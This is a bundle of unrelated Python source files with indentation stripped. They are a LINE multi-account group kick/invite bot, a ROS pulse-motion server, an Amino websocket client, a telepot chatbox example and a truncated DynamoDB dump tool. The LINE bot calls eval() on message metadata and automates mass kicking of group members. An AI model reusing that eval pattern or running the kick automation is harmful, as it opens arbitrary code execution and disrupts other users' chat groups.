a002.inviteIntoGroup(receiver,[M003D23])
except:
try:
a003.leaveGroup(receiver)
except:
pass
if spl == "off":
if receiver in status["strictmode"]:
status["strictmode"].remove(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Disable")
try:
a003.acceptGroupInvitation(receiver)
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nNot Active")
elif hlth.startswith("checkbot"):
if sender in creator or sender in owner or sender in admin:
try:a001.inviteIntoGroup(to, [M001D23]);has = "OK"
except:has = "NOT"
try:a001.kickoutFromGroup(to, [M001D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a001.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a002.inviteIntoGroup(to, [M002D23]);has = "OK"
except:has = "NOT"
try:a002.kickoutFromGroup(to, [M002D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a002.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a003.inviteIntoGroup(to, [M003D23]);has = "OK"
except:has = "NOT"
try:a003.kickoutFromGroup(to, [M003D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a003.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
elif hlth.startswith("changename:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a001.getProfile()
dname.displayName = name
a001.updateProfile(dname)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a002.getProfile()
dname.displayName = name
a002.updateProfile(dname)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a003.getProfile()
dname.displayName = name
a003.updateProfile(dname)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname1 = a001.getProfile()
dname1.displayName = name
a001.updateProfile(dname1)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname2 = a002.getProfile()
dname2.displayName = name
a002.updateProfile(dname2)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname3 = a003.getProfile()
dname3.displayName = name
a003.updateProfile(dname3)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a001.getProfile()
bio.statusMessage = name
a001.updateProfile(bio)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a002.getProfile()
bio.statusMessage = name
a002.updateProfile(bio)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a003.getProfile()
bio.statusMessage = name
a003.updateProfile(bio)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio1 = a001.getProfile()
bio1.statusMessage = name
a001.updateProfile(bio1)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio2 = a002.getProfile()
bio2.statusMessage = name
a002.updateProfile(bio2)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio3 = a003.getProfile()
bio3.statusMessage = name
a003.updateProfile(bio3)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changepict:"):
if sender in creator or sender in owner:
spl = hlth.replace("changepict:","")
if spl == "1":
settings["updatePict"][M001D23] = True
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "2":
settings["updatePict"][M002D23] = True
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "3":
settings["updatePict"][M003D23] = True
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "all":
settings["updatePict"][M001D23] = True
settings["updatePict"][M002D23] = True
settings["updatePict"][M003D23] = True
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
else:
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nAccess Limited For Owner Only")
elif hlth.startswith("kick"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in creator or target in owner or target in admin or target in staff or target in Bots or target in mybots:
pass
else:
try:
d23X_72 = threading.Thread(target=kick, args=(receiver, target)).start()
except:
pass
elif hlth.startswith("invite "):
if sender in creator or sender in owner:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
try:
d23X_73 = threading.Thread(target=invite, args=(receiver, ls)).start()
except:
pass
elif hlth.startswith("invto "):
if sender in creator or sender in owner:
cond = text.split(" ")
num = int(cond[1])
gid = a001.getGroupIdsJoined()
group = a001.getGroup(gid[num-1])
a001.findAndAddContactsByMid(sender)
a001.inviteIntoGroup(gid[num-1],[sender])
a001.sendReplyMessage(reply,receiver, "Invited: "+str(group.name))
if op.type == 15 or op.type == 128:
if op.type == 15: print ("[ 15 ] NOTIFIED LEAVE GROUP")
else: print ("[ 128 ] NOTIFIED DELETE SELF FROM CHAT")
if op.param1 in status["strictmode"]:
if op.param2 == M003D23:
try:
strict = threading.Thread(target=invite, args=(op.param1, op.param2)).start()
except:
pass
backupData()
except Exception as error:
logError(error)
traceback.print_tb(error.__traceback__)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def run():
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops != None:
for op in ops:
loop.run_until_complete(mobanzu(op))
oepoll.setRevision(op.revision)
except Exception as error:
logError(error)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
if __name__ == '__main__':
run()
print('\n》》》》PROGRAM STARTED《《《《\n')
threading.Thread(target=loop.run_until_complete(mobanzu(op))).start()
|
pulse_motion_server.py
|
#! /usr/bin/env python
"""
pulse_motion.py
Zhiang Chen, Nov 2020
"""
import rospy
from std_msgs.msg import Float64
from sensor_msgs.msg import JointState
import actionlib
import pbr_gazebo.msg
from threading import Thread
from collections import deque
import numpy as np
from numpy import pi, sin
class PulseMotion(object):
def __init__(self, action_name='pulse_motion_server'):
self.default_vel = 0.0
# joint state subscriber
self.x = 0
rospy.Subscriber("/prismatic_box_controller/joint_states", JointState, self.jointstate_cb)
# velocity controller
self.Hz = 200
self.vel_pub = rospy.Publisher('/prismatic_box_controller/prismatic_joint_controller/command', Float64, queue_size=10)
self.vel_command = self.default_vel
self.vel_thread = Thread(target=self.send_vel, args=())
self.vel_thread.daemon = True
self.vel_thread.start()
# pulse motion action server
self._feedback = pbr_gazebo.msg.AFFeedback()
self._result = pbr_gazebo.msg.AFResult()
self._as = actionlib.SimpleActionServer(action_name, pbr_gazebo.msg.AFAction,
execute_cb=self.execute_cb, auto_start=False)
self._as.start()
rospy.loginfo("pulse_motion_planner/" + action_name + " has been initialized!")
def execute_cb(self, goal):
A = goal.A
F = goal.F
rate = rospy.Rate(self.Hz) # Hz
if A*F == 0:
# reset
err = - self.x
errs = deque(maxlen=5)
errs.append(0)
P = 1
I = 0.2
while abs(err)>0.001:
self.vel_command = P*err + I*np.array(errs).mean()
rate.sleep()
err = - self.x
errs.append(err)
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('reset completed')
else:
# pulse motion
# displacement function: d = -A*cos(2*pi*F*t) + A
# velocity function: v = 2*pi*A*F*sin(2*pi*F*t)
# acceleration function: a = 4*pi^2*F^2*A*cos(2*pi*F*t)
print(goal)
T = 1. / F # T is rock displacement period
step_nm = int(T*self.Hz)+1 # self.Hz is control rate;
# step_nm is publishing number for controller
for j in range(step_nm):
t = j*(1./self.Hz)
self.vel_command = 2*pi*A*F*sin(2*pi*F*t)
# print('t', t)
# print('F', F)
# print('A', A)
# print(2*pi*t/F)
# print(self.vel_command)
# print('-')
rate.sleep()
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('pulse motion completed')
def jointstate_cb(self, data):
self.x = data.position[0]
def send_vel(self):
rate = rospy.Rate(self.Hz) # Hz
while not rospy.is_shutdown():
self.vel_pub.publish(self.vel_command)
rate.sleep()
if __name__ == '__main__':
rospy.init_node("pulse_motion_planner", anonymous=False)
pulse_motion_planner = PulseMotion()
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Node killed!")
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
if socket_trace: websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.debug = debug
self.active = True
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
self.socket_stop = False
self.socketDelay = 0
self.socket_trace = socket_trace
self.socketDelayFetch = 120 # Reconnects every 120 seconds.
def run_socket(self):
threading.Thread(target=self.reconnect_handler).start()
websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
if self.debug:
print("[socket][on_close] reconnect is True, Opening Socket")
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
contextlib.suppress(self.socket.sock.pong(data))
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
def __init__(self, client):
self.client = client
self.handlers = {}
self.methods = {
304: self._resolve_chat_action_start,
306: self._resolve_chat_action_end,
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"1:0": self.on_strike_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"50:0": self.TYPE_USER_SHARE_EXURL,
"51:0": self.TYPE_USER_SHARE_USER,
"52:0": self.on_voice_chat_not_answered,
"53:0": self.on_voice_chat_not_cancelled,
"54:0": self.on_voice_chat_not_declined,
"55:0": self.on_video_chat_not_answered,
"56:0": self.on_video_chat_not_cancelled,
"57:0": self.on_video_chat_not_declined,
"58:0": self.on_avatar_chat_not_answered,
"59:0": self.on_avatar_chat_not_cancelled,
"60:0": self.on_avatar_chat_not_declined,
"100:0": self.on_delete_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite,
"104:0": self.on_chat_background_changed,
"105:0": self.on_chat_title_changed,
"106:0": self.on_chat_icon_changed,
"107:0": self.on_voice_chat_start,
"108:0": self.on_video_chat_start,
"109:0": self.on_avatar_chat_start,
"110:0": self.on_voice_chat_end,
"111:0": self.on_video_chat_end,
"112:0": self.on_avatar_chat_end,
"113:0": self.on_chat_content_changed,
"114:0": self.on_screen_room_start,
"115:0": self.on_screen_room_end,
"116:0": self.on_chat_host_transfered,
"117:0": self.on_text_message_force_removed,
"118:0": self.on_chat_removed_message,
"119:0": self.on_text_message_removed_by_admin,
"120:0": self.on_chat_tip,
"121:0": self.on_chat_pin_announcement,
"122:0": self.on_voice_chat_permission_open_to_everyone,
"123:0": self.on_voice_chat_permission_invited_and_requested,
"124:0": self.on_voice_chat_permission_invite_only,
"125:0": self.on_chat_view_only_enabled,
"126:0": self.on_chat_view_only_disabled,
"127:0": self.on_chat_unpin_announcement,
"128:0": self.on_chat_tipping_enabled,
"129:0": self.on_chat_tipping_disabled,
"65281:0": self.on_timestamp_message,
"65282:0": self.on_welcome_message,
"65283:0": self.on_invite_message
}
self.chat_actions_start = {
"Typing": self.on_user_typing_start,
}
self.chat_actions_end = {
"Typing": self.on_user_typing_end,
}
def _resolve_chat_message(self, data):
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def _resolve_chat_action_start(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_start.get(key, self.default)(data)
def _resolve_chat_action_end(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_end.get(key, self.default)(data)
def resolve(self, data):
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def call(self, type, data):
if type in self.handlers:
for handler in self.handlers[type]:
handler(data)
def event(self, type):
def registerHandler(handler):
if type in self.handlers:
self.handlers[type].append(handler)
else:
self.handlers[type] = [handler]
return handler
return registerHandler
def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
chatbox_nodb.py
|
import sys
import telepot
from telepot.delegate import per_chat_id_in, call, create_open
"""
$ python3.2 chatbox_nodb.py <token> <owner_id>
Chatbox - a mailbox for chats
1. People send messages to your bot.
2. Your bot remembers the messages.
3. You read the messages later.
This version only stores the messages in memory. If the bot is killed, all messages are lost.
This version only handles text messages.
It accepts the following commands from you, the owner, only:
- /unread - tells you who has sent you messages and how many
- /next - read next sender's messages
It can be a starting point for customer-support type of bots.
"""
# Simulate a database to store unread messages
class UnreadStore(object):
def __init__(self):
self._db = {}
def put(self, msg):
chat_id = msg['chat']['id']
if chat_id not in self._db:
self._db[chat_id] = []
self._db[chat_id].append(msg)
# Pull all unread messages of a `chat_id`
def pull(self, chat_id):
messages = self._db[chat_id]
del self._db[chat_id]
# sort by date
messages.sort(key=lambda m: m['date'])
return messages
# Tells how many unread messages per chat_id
def unread_per_chat(self):
return [(k,len(v)) for k,v in self._db.items()]
# Accept commands from owner. Give him unread messages.
class OwnerHandler(telepot.helper.ChatHandler):
def __init__(self, seed_tuple, timeout, store):
super(OwnerHandler, self).__init__(seed_tuple, timeout)
self._store = store
def _read_messages(self, messages):
for msg in messages:
# assume all messages are text
self.sender.sendMessage(msg['text'])
def on_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type != 'text':
self.sender.sendMessage("I don't understand")
return
command = msg['text'].strip().lower()
# Tells who has sent you how many messages
if command == '/unread':
results = self._store.unread_per_chat()
lines = []
for r in results:
n = 'ID: %d\n%d unread' % r
lines.append(n)
if not len(lines):
self.sender.sendMessage('No unread messages')
else:
self.sender.sendMessage('\n'.join(lines))
# read next sender's messages
elif command == '/next':
results = self._store.unread_per_chat()
if not len(results):
self.sender.sendMessage('No unread messages')
return
chat_id = results[0][0]
unread_messages = self._store.pull(chat_id)
self.sender.sendMessage('From ID: %d' % chat_id)
self._read_messages(unread_messages)
else:
self.sender.sendMessage("I don't understand")
class MessageSaver(telepot.helper.Monitor):
def __init__(self, seed_tuple, store, exclude):
# The `capture` criteria means to capture all messages.
super(MessageSaver, self).__init__(seed_tuple, capture=[{'_': lambda msg: True}])
self._store = store
self._exclude = exclude
# Store every message, except those whose sender is in the exclude list, or non-text messages.
def on_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if chat_id in self._exclude:
print('Chat id %d is excluded.' % chat_id)
return
if content_type != 'text':
print('Content type %s is ignored.' % content_type)
return
print('Storing message: %s' % msg)
self._store.put(msg)
import threading
class CustomThread(threading.Thread):
def start(self):
print('CustomThread starting ...')
super(CustomThread, self).start()
# Note how this function wraps around the `call()` function below to implement
# a custom thread for delegation.
def custom_thread(func):
def f(seed_tuple):
target = func(seed_tuple)
if type(target) is tuple:
run, args, kwargs = target
t = CustomThread(target=run, args=args, kwargs=kwargs)
else:
t = CustomThread(target=target)
return t
return f
class ChatBox(telepot.DelegatorBot):
def __init__(self, token, owner_id):
self._owner_id = owner_id
self._seen = set()
self._store = UnreadStore()
super(ChatBox, self).__init__(token, [
# Here is a delegate to specially handle owner commands.
(per_chat_id_in([owner_id]), create_open(OwnerHandler, 20, self._store)),
# Seed is always the same, meaning only one MessageSaver is ever spawned for entire application.
(lambda msg: 1, create_open(MessageSaver, self._store, exclude=[owner_id])),
# For senders never seen before, send him a welcome message.
(self._is_newcomer, custom_thread(call(self._send_welcome))),
])
# seed-calculating function: use returned value to indicate whether to spawn a delegate
def _is_newcomer(self, msg):
chat_id = msg['chat']['id']
if chat_id == self._owner_id: # Sender is owner
return None # No delegate spawned
if chat_id in self._seen: # Sender has been seen before
return None # No delegate spawned
self._seen.add(chat_id)
return [] # non-hashable ==> delegates are independent, no seed association is made.
def _send_welcome(self, seed_tuple):
chat_id = seed_tuple[1]['chat']['id']
print('Sending welcome ...')
self.sendMessage(chat_id, 'Hello!')
TOKEN = sys.argv[1]
OWNER_ID = int(sys.argv[2])
bot = ChatBox(TOKEN, OWNER_ID)
bot.notifyOnMessage(run_forever=True)
|
dynamodump.py
|
#!/usr/bin/env python
import argparse
import json
import logging
import os
import shutil
import threading
import boto.dynamodb2.layer1
import datetime
import errno
import sys
import time
import re
from boto.dynamodb2.layer1 import DynamoDBConnection
from botocore.exceptions import BotoCoreError
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
def get_table_name_matches(conn, table_name_wildcard, separator):
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if table_name_wildcard == "*":
matching_tables.append(table_name)
elif separator is None:
if table_name.startswith(table_name_wildcard.split("*", 1)[0]):
matching_tables.append(table_name)
elif separator == '':
if table_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]).split()[0]):
matching_tables.append(table_name)
elif table_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.." % args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!" % dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == '':
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]).split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == '':
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name).split(' ', 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
